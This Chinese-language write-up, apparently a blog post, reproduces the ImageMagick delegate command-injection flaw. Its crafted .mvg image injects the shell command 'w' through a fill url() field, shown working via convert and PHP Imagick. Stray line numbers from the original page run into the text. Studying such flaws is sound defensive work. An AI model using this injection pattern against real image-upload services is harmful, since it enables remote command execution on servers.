原因:
ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行
在ImageMagick的默认配置文件里可以看到所有的委托: /etc/ImageMagick/delegates.xml
有一行直接执行:1
<delegate decode="https" command=""curl" -s -k -o "%o" "https:%M""/>
环境搭建:
系统kali-linux-2016.1-amd641
2
3
4
5
6
7
8
9root@kali:~# apt-get install php-dev
root@kali:~# apt-get install libmagickwand-dev
root@kali:~# pecl install imagick
root@kali:~# apt-get install php-imagick
root@kali:~# echo "extension=imagick.so" >> /etc/php5/apache2/php.ini
测试:
直接操作:
我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg):1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30root@kali:~/Desktop# vi 1.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|w")'
pop graphic-context
root@kali:~/Desktop# convert 1.mvg 1.png
08:53:29 up 1:34, 1 user, load average: 0.00, 0.04, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty2 :0 05:32 3:21m 3:06 0.46s /usr/bin/python
convert: unrecognized color `https://"|w"' @ warning/color.c/GetColorCompliance/1046.
convert: unable to open image `/tmp/magick-26436IZkdSTzRhkfm': 没有那个文件或目录 @ error/blob.c/OpenBlob/2709.
convert: unable to open file `/tmp/magick-26436IZkdSTzRhkfm': 没有那个文件或目录 @ error/constitute.c/ReadImage/540.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3182.
```
#### php测试:
```bash
root@kali:~/Desktop# vi 1.php
<?php
new Imagick("1.mvg")
?>
运行
root@kali:~/Desktop# php 1.php
08:57:43 up 1:38, 1 user, load average: 0.00, 0.02, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty2 :0 05:32 3:25m 3:14 0.46s /usr/bin/python
php7.0: unrecognized color `https://"|w"' @ warning/color.c/GetColorCompliance/1046.
php7.0: unable to open image `/tmp/magick-26514R1_vHPpfdb1l': No such file or directory @ error/blob.c/OpenBlob/2709.
php7.0: unable to open file `/tmp/magick-26514R1_vHPpfdb1l': No such file or directory @ error/constitute.c/ReadImage/540.
